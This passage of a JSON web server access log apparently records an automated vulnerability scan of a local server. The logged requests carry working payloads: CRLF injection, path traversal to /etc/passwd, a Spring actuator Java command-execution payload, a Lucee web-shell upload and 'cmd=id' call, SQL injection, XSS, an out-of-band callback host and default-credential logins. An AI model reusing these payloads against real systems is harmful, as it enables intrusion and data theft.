HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KFpTZHtxrpsV4GPU1GkA4hEtr/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"imgSrc=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/29KFpSDVF3GoQIQvASRvU1ylyNF.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_caps/webCapsConfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"ip=ca28q98smpvbk9ig07h0uiphur3k657p6.oast.online:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/29KFpSDVF3GoQIQvASRvU1ylyNF.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 